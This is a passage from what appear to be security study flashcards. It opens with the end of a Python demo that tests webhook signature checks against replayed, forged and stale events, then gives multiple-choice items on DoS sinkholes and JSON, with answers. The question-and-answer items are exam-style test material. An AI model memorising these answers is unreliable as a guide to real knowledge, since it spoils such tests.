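    hook.plans.update({"u1": "trial", "u2": "trial"})
    ts = 1_700_000_000

    def post(event: dict, signed: bool = True, now: int = ts) -> tuple:
        body = json.dumps(event).encode()
        headers = {"X-Signature-Timestamp": str(ts)}
        if signed:
            headers["X-Signature"] = sign(body, secret, ts)
        return hook.handle(headers, body, now=now)

    succeeded = {"id": "evt_1", "type": "payment.succeeded", "data": {"user_id": "u1"}}
    failed = {"id": "evt_2", "type": "payment.failed", "data": {"user_id": "u2"}}
    forged = {"id": "evt_3", "type": "payment.succeeded", "data": {"user_id": "u2"}}
    return {
        "legit": post(succeeded),
        "replay": post(succeeded),
        "failed": post(failed),
        "forged": post(forged, signed=False),
        "stale": post(forged, now=ts + 2 * TOLERANCE_SECONDS),
        "plans": dict(hook.plans),
    }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Only the signed, fresh, first-seen "payment.succeeded" event changes a plan; the forged message is refused with 401 and u2 stays on the trial even though the forged body asked for an upgrade.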

32
Q

Recently there was a DoS attack on one of the servers, which succeeded in taking the server down for three hours. You would like to deploy a solution that would allow you to detect a huge rush of traffic to a specific device and route it somewhere away from the device. What technique could you use?

A)Network segmentation
B)System isolation
C)Endpoint security
D)Sinkholes

A

You could use a sinkhole. A sinkhole is a routing mechanism that can route traffic from a device being flooded to a location where the traffic can be studied.

33
Q

Your team recently suffered several attacks that leveraged the use of programming and scripting languages. They are investigating these languages. Which of the following is a lightweight formatted script designed for data transfer in which data is represented in name/value pairs separated by a comma?

A)XML
B)Python
C)PowerShell
D)JavaScript Object Notation (JSON)

A

JSON (JavaScript Object Notation) is an open standard file and data interchange format that uses human-readable text to store and transmit data objects consisting of comma-separated name/value pairs and ordered arrays. It is the usual body format for web APIs and webhook messages, which is why it turns up in both legitimate traffic and in the command-and-control traffic of scripted attacks.